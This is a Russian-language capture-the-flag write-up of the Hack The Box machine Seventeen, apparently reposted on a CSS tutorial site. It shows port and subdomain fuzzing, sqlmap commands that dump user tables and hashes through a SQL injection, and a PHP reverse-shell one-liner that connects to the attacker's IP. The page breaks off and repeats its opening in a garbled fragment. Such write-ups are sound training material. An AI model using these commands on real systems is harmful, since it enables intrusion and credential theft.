HTB Seventeen. Подменяем пакет NPM для захвата хоста - «Новости» » Самоучитель CSS
Меню
Наши новости
Учебник CSS

Невозможно отучить людей изучать самые ненужные предметы.

Введение в CSS
Преимущества стилей
Добавления стилей
Типы носителей
Базовый синтаксис
Значения стилевых свойств
Селекторы тегов
Классы
CSS3

Надо знать обо всем понемножку, но все о немногом.

Идентификаторы
Контекстные селекторы
Соседние селекторы
Дочерние селекторы
Селекторы атрибутов
Универсальный селектор
Псевдоклассы
Псевдоэлементы

Кто умеет, тот делает. Кто не умеет, тот учит. Кто не умеет учить - становится деканом. (Т. Мартин)

Группирование
Наследование
Каскадирование
Валидация
Идентификаторы и классы
Написание эффективного кода

Самоучитель CSS

Вёрстка
Изображения
Текст
Цвет
Линии и рамки
Углы
Списки
Ссылки
Дизайны сайтов
Формы
Таблицы
CSS3
HTML5

Новости

Блог для вебмастеров
Новости мира Интернет
Сайтостроение
Ремонт и советы
Все новости

Справочник CSS

Справочник от А до Я
HTML, CSS, JavaScript

Афоризмы

Афоризмы о учёбе
Статьи об афоризмах
Все Афоризмы

Видео Уроки


Наш опрос



Наши новости

       
29-09-2022, 00:00
HTB Seventeen. Подменяем пакет NPM для захвата хоста - «Новости»
Рейтинг:
Категория: Новости

Hack The Box. Задание оце­нено как слож­ное.

warning


Под­клю­чать­ся к машинам с HTB рекомен­дует­ся толь­ко через VPN. Не делай это­го с компь­юте­ров, где есть важ­ные для тебя дан­ные, так как ты ока­жешь­ся в общей сети с дру­гими учас­тни­ками.



 

Разведка


 

Сканирование портов


До­бав­ляем IP-адрес машины в /etc/hosts:


10.10.11.165 seventeen.htb

И запус­каем ска­ниро­вание пор­тов.



Справка: сканирование портов


Ска­ниро­вание пор­тов — стан­дар­тный пер­вый шаг при любой ата­ке. Он поз­воля­ет ата­кующе­му узнать, какие служ­бы на хос­те при­нима­ют соеди­нение. На осно­ве этой информа­ции выбира­ется сле­дующий шаг к получе­нию точ­ки вхо­да.


На­ибо­лее извес­тный инс­тру­мент для ска­ниро­вания — это Nmap. Улуч­шить резуль­таты его работы ты можешь при помощи сле­дующе­го скрип­та.


ports=$(nmap -p- --min-rate=500 $1 | grep^[0-9] | cut -d '/' -f 1 | tr 'n' ',' | sed s/,$//)nmap -p$ports -A $1

Он дей­ству­ет в два эта­па. На пер­вом про­изво­дит­ся обыч­ное быс­трое ска­ниро­вание, на вто­ром — более тща­тель­ное ска­ниро­вание, с исполь­зовани­ем име­ющих­ся скрип­тов (опция -A).



Ре­зуль­тат работы скрип­та

Ви­дим три откры­тых пор­та:



  • 22 — служ­ба OpenSSH 7.6p1;

  • 80 — веб‑сер­вер Apache 2.4.29;

  • 8000 — веб‑сер­вер Apache 2.4.38.


Нам дос­тупно сра­зу два веб‑сер­вера, с которых и нач­нем про­бивать периметр.


Глав­ная стра­ница сай­та

Ос­мотрев­шись на сай­те, находим под­твержде­ние тому, что в самом начале выб­рали вер­ное домен­ное имя.


Лен­динг

Боль­ше ничего инте­рес­ного нет, поэто­му перей­дем к активно­му ска­ниро­ванию.


 

Точка входа


Итак, я поп­робую поис­кать скры­тые фай­лы и катало­ги. Делать это я буду при помощи ска­нера ffuf.



Справка: сканирование веба c ffuf


Од­но из пер­вых дей­ствий при тес­тирова­нии безопас­ности веб‑при­ложе­ния — это ска­ниро­вание методом перебо­ра катало­гов, что­бы най­ти скры­тую информа­цию и недос­тупные обыч­ным посети­телям фун­кции. Для это­го мож­но исполь­зовать прог­раммы вро­де dirsearch и DIRB.


Я пред­почитаю лег­кий и очень быс­трый ffuf. При запус­ке ука­зыва­ем сле­дующие парамет­ры:




  • -w — сло­варь (я исполь­зую сло­вари из набора SecLists);


  • -t — количес­тво потоков;


  • -u — URL;


  • -fc — исклю­чить из резуль­тата отве­ты с кодом 403.


ffuf -u 'http://seventeen.htb/FUZZ' -t 256 -wdirectory_2.3_medium_lowercase.txt
Ре­зуль­тат ска­ниро­вания катало­гов с помощью ffuf

Ска­ниро­вание катало­гов ничего инте­рес­ного не дало. Дру­гих HTML-стра­ниц тоже не наш­лось. Оста­ется прос­каниро­вать под­домены. В этом слу­чае мы будем переби­рать заголо­вок Host в парамет­ре -H. Так как все отве­ты будут вес­ти на основной домен, можем их отфиль­тро­вать по раз­меру стра­ницы в парамет­ре --fs.


ffuf -u 'http://seventeen.htb/' -t 256 -wsubdomains-top1million-110000.txt -H 'Host: FUZZ.seventeen.htb' --fs20689
Ре­зуль­тат ска­ниро­вания под­доменов

На­ходим один под­домен, запись для которо­го добав­ляем в /etc/hosts.


10.10.11.165 seventeen.htb exam.seventeen.htb
Глав­ная стра­ница сай­та exam.seventeen.htb 

Exam Reviewer Management System


На сай­те нас встре­чает Exam Reviewer Management System, для которой мы лег­ко находим пуб­личный экс­пло­ит в базе Exploit-DB. Это SQL-инъ­екция.


Опи­сание спо­соба экс­плу­ата­ции

Нам пре­дос­тавля­ют готовую наг­рузку, которой неп­ремен­но сто­ит вос­поль­зовать­ся. Пер­вым делом запус­тим sqlmap.


sqlmap -u 'http://exam.seventeen.htb/?p=take_exam&id=1' -p id --level 3
Ра­бочая наг­рузка для экс­плу­ата­ции

Sqlmap нашел наг­рузку, теперь получим базы дан­ных (параметр --dbs).


sqlmap -u 'http://exam.seventeen.htb/?p=take_exam&id=1' -p id --dbs --level 3
HTB Seventeen. Подменяем пакет NPM для захвата хоста - «Новости»
Ба­зы дан­ных

От­меча­ем для себя, что на сер­вере исполь­зуют­ся и дру­гие плат­формы, вклю­чая Roundcube. Нач­нем с пер­вой базы, получим таб­лицы (параметр --tables) из базы db_sfms (параметр -D).


sqlmap -u 'http://exam.seventeen.htb/?p=take_exam&id=1' -Ddb_sfms --tables
Таб­лицы в базе db_sfms

Да­вай сдам­пим (параметр --dump) таб­лицы user и student (параметр -T). Для быс­тро­ты исполь­зуем десять потоков (параметр --threads).


sqlmap -u 'http://exam.seventeen.htb/?p=take_exam&id=1' --threads 10 -Ddb_sfms -Tuser --dump
Со­дер­жимое таб­лицы user
sqlmap -u 'http://exam.seventeen.htb/?p=take_exam&id=1' --threads 10 -Ddb_sfms -Tstudent --dump
Со­дер­жимое таб­лицы student

По­лучи­ли мно­го хешей, что не может не радовать. Теперь перей­дем к базе erms_db и по при­выч­ному сце­нарию сна­чала узна­ем таб­лицы.


sqlmap -u 'http://exam.seventeen.htb/?p=take_exam&id=1' --threads 10 -Derms_db --tables
Таб­лицы в базе erms_db

Из этой базы тоже сдам­пим поль­зовате­лей.


sqlmap -u 'http://exam.seventeen.htb/?p=take_exam&id=1' --threads 10 -Derms_db -T users --dump
Со­дер­жимое таб­лицы user

Кро­ме хешей, мы рас­кры­ваем каталог с ава­тара­ми, а это неиз­вес­тная до дан­ного момен­та дирек­тория на веб‑сер­вере — /oldmanagement! Из Roundcube ничего не получа­ем, поэто­му с помощью онлай­новой базы кря­каем хеши.


Взлом хешей

По­луча­ем один пароль, с которым поп­робу­ем пой­ти на най­ден­ный сайт — School File Management System.


Сайт seventeen.htb:8000/oldmanagement 

Точка опоры


Пос­ле авто­риза­ции видим заг­ружен­ный файл, который мы, конеч­но же, ска­чаем.


Про­филь поль­зовате­ля Kelly

Нем­ного почитав про эту сис­тему, я узнал о воз­можнос­ти заг­рузить и выпол­нить файл на PHP. Файл будет рас­положен в катало­ге /files/31234/. В качес­тве реверс‑шел­ла заг­ружа­ем прос­той скрипт:


<?php system("bash -c 'bash -i >& /dev/tcp/10.10.14.16/4321 0>&1'"); ?>
Спи­сок заг­ружен­ных фай­лов

Об­раща­емся к нашему скрип­ту по сле­дующе­му адре­су:


http://seventeen.htb:8000/oldmanagement/files/31234/reverse.php

Hack The Box. Задание оце­нено как слож­ное. warning Под­клю­чать­ся к машинам с HTB рекомен­дует­ся толь­ко через VPN. Не делай это­го с компь­юте­ров, где есть важ­ные для тебя дан­ные, так как ты ока­жешь­ся в общей сети с дру­гими учас­тни­ками. Разведка Сканирование портов До­бав­ляем IP-адрес машины в /etc/hosts: 10. 10. 11. 165 seventeen. htb И запус­каем ска­ниро­вание пор­тов. Справка: сканирование портов Ска­ниро­вание пор­тов — стан­дар­тный пер­вый шаг при любой ата­ке. Он поз­воля­ет ата­кующе­му узнать, какие служ­бы на хос­те при­нима­ют соеди­нение. На осно­ве этой информа­ции выбира­ется сле­дующий шаг к получе­нию точ­ки вхо­да. На­ибо­лее извес­тный инс­тру­мент для ска­ниро­вания — это Nmap. Улуч­шить резуль­таты его работы ты можешь при помощи сле­дующе­го скрип­та. ports = $(nmap -p- --min-rate =500 $1 | grep ^_

Теги: CSS

Просмотров: 341
Комментариев: 0:   29-09-2022, 00:00
Уважаемый посетитель, Вы зашли на сайт как незарегистрированный пользователь. Мы рекомендуем Вам зарегистрироваться либо войти на сайт под своим именем.

 
Еще новости по теме:



Другие новости по теме: